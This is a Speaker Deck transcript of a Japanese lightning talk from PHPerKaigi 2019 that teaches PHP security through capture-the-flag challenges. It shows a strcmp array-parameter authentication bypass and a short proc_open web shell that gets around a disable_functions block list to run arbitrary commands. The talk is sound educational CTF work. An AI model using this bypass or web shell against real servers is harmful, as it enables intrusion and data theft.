Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
CTFで学ぶPHPセキュリティ
Search
Ryoto Saito
March 31, 2019
Programming
3
4k
CTFで学ぶPHPセキュリティ
PHPerKaigi 2019
ルーキーズLT
Ryoto Saito
March 31, 2019
Tweet
Share
More Decks by Ryoto Saito
See All by Ryoto Saito
コンテナ上シェル悪用の話とPure Bashでcurlが作れた話
ryotosaito
2
600
シェル芸のせかい / the Shellgei World
ryotosaito
2
1.6k
Other Decks in Programming
See All in Programming
Grafana:建立系統全知視角的捷徑
blueswen
0
280
GISエンジニアから見たLINKSデータ
nokonoko1203
0
190
Spinner 軸ズレ現象を調べたらレンダリング深淵に飲まれた #レバテックMeetup
bengo4com
1
210
GoLab2025 Recap
kuro_kurorrr
0
3.6k
QAフローを最適化し、品質水準を満たしながらリリースまでの期間を最短化する #RSGT2026
shibayu36
0
1.8k
ThorVG Viewer In VS Code
nors
0
660
MDN Web Docs に日本語翻訳でコントリビュート
ohmori_yusuke
0
390
re:Invent 2025 のイケてるサービスを紹介する
maroon1st
0
160
PostgreSQLで手軽にDuckDBを使う!DuckDB&pg_duckdb入門/osc25hi-duckdb
takahashiikki
0
240
生成AI時代を勝ち抜くエンジニア組織マネジメント
coconala_engineer
0
39k
これならできる!個人開発のすゝめ
tinykitten
PRO
0
150
疑似コードによるプロンプト記述、どのくらい正確に実行される?
kokuyouwind
0
140
Featured
See All Featured
Building the Perfect Custom Keyboard
takai
2
670
Visual Storytelling: How to be a Superhuman Communicator
reverentgeek
2
410
The Power of CSS Pseudo Elements
geoffreycrofte
80
6.1k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
666
130k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
141
34k
A Guide to Academic Writing Using Generative AI - A Workshop
ks91
PRO
0
170
AI in Enterprises - Java and Open Source to the Rescue
ivargrimstad
0
1.1k
How to Build an AI Search Optimization Roadmap - Criteria and Steps to Take #SEOIRL
aleyda
1
1.8k
Lightning Talk: Beautiful Slides for Beginners
inesmontani
PRO
1
420
Agile that works and the tools we love
rasmusluckow
331
21k
エンジニアに許された特別な時間の終わり
watany
106
220k
The Curse of the Amulet
leimatthew05
0
7.1k
Transcript
CTFで学ぶ PHPセキュリティ 2019/3/31 PHPerKaigi ルーキーズLT Ryoto (@systemctl_ryoto) 1
CTF - Capture the Flag 2
CTF Capture the Flag • FPSのゲームルール の1種 • 敵陣のフラッグを自陣 に持ち帰る
• 由来は物理的な遊び • 転じて… 3
CTF Capture the Flag • 情報セキュリティ的に脆弱な 「何か」が用意される • その脆弱性を突いてFlagを取得 する競技
※ Flag = 仮想的な機密文字列 flag{PHP_is_s3cur3!} ↑過去に本当に見たことあるやつ • 問題ベースで楽しくセキュリティ が勉強できる! • 徳丸さんの挑戦状もCTF 4
PHPer チャレンジ は シェルを 奪えます ls -al /もmysqldumpも実行できる 5
CTFの 主要な ジャンル 厳密な分類は大会やサイトによって 微妙に異なる 6 Pwn プログラムの脆弱性を突く Reverse リバースエンジニアリング
Forensic パケットやFile systemなど Crypto 暗号解読 Web クライアントからサーバまで
Webの CTF 情報セキュリティ的に脆弱な「何か」 • 「Webサイト」 • 「ソースコード」 どこが脆弱かはもちろん、どこにFlag があるのかがわからないことも たのしい謎解きの始まり
7
CTFのPHP問題例 - 実際の問題の一部分 - 8
前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)
== 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 9
前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)
== 0) { echo FLAG; } 目標:なんとか突破したい! 言語仕様に関する問題 10
言語仕様に関する問題 11
言語仕様に関する問題 12
言語仕様に関する問題 13 if (strcmp($_GET['password'], PASSWORD) == 0) strcmpは配列や関数などを受け取るとnull+Warningを返す) <?php var_dump($_GET);
http://localhost/dump.php?password[]=admin にアクセス↓ array(1) { ["password"] => array(1) { [0] => string(5) "admin" } }
include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==
0) { echo FLAG; } 目標:なんとか突破したい! 先ほどのヒントを踏まえると… 言語仕様に関する問題 14
include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==
0) { echo FLAG; } 目標:なんとか突破したい! Ans: http://target.host/?password[]= 言語仕様に関する問題 15
前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 <?php phpinfo(); disable_functions pcntl_exec, exec, popen, passthru, shell_exec, system
目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行 16
(注:shell_execと等価なので`cmd`はダメ) 任意コード実行 17
pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 任意コード実行 18
pcntl_exec, exec, popen, passthru, shell_exec, system... proc_open関数がノーマーク 前提:任意の.phpファイルがUpload、実行できる脆弱性が発覚 目的:シェルを奪いたい!(任意コマンドを実行したい) 任意コード実行
19
Ans. 以下のPHPファイルをアップロード <?php $cmd = $_GET['cmd'] $process = proc_open($cmd, [1=>["pipe",
"w"]], $pipes); echo stream_get_contents($pipes[1]); これを1回アップロードすれば?cmd=...でやりたい放題 任意コード実行 20
CTFに興味が湧いてきた人は! 21
やってみよう! 22 常設CTF(Web・PHP問題が入門から充実している) • https://www.root-me.org/en/Challenges/Web-Server/ • http://websec.fr/ ※ 垢登録するときは捨てパスワードを使いましょう 慣れたらコンテストに参加!
• https://ctftime.org
困ったときは 23 CTFでは解答例のことを Write-up と呼びます。 考えてもわからなかったら答えを探すのもあり! ("Write-up"で検索して問題を探す荒技もあり)
Thank you! @systemctl_ryoto 24
ryotosaito
blueswen
nokonoko1203
bengo4com
kuro_kurorrr
shibayu36
nors
ohmori_yusuke
maroon1st
takahashiikki
coconala_engineer
tinykitten
kokuyouwind
takai
reverentgeek
geoffreycrofte
pedronauck
eileencodes
ks91
ivargrimstad
aleyda
inesmontani
rasmusluckow
watany
leimatthew05
![前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)](https://files.speakerdeck.com/presentations/66a23902f8b34880ab2d8abe4d89fc98/slide_8.jpg){kind=link}
![前提:パスワード認証のソースを入手した include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD)](https://files.speakerdeck.com/presentations/66a23902f8b34880ab2d8abe4d89fc98/slide_9.jpg){kind=link}
![言語仕様に関する問題 13 if (strcmp($_GET['password'], PASSWORD) == 0) strcmpは配列や関数などを受け取るとnull+Warningを返す) <?php var_dump($_GET);](https://files.speakerdeck.com/presentations/66a23902f8b34880ab2d8abe4d89fc98/slide_12.jpg){kind=link}
![include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==](https://files.speakerdeck.com/presentations/66a23902f8b34880ab2d8abe4d89fc98/slide_13.jpg){kind=link}
![include "define.php"; /* 403 Forbidden */ if (strcmp($_GET['password'], PASSWORD) ==](https://files.speakerdeck.com/presentations/66a23902f8b34880ab2d8abe4d89fc98/slide_14.jpg){kind=link}
![Ans. 以下のPHPファイルをアップロード <?php $cmd = $_GET['cmd'] $process = proc_open($cmd, [1=>["pipe",](https://files.speakerdeck.com/presentations/66a23902f8b34880ab2d8abe4d89fc98/slide_19.jpg){kind=link}
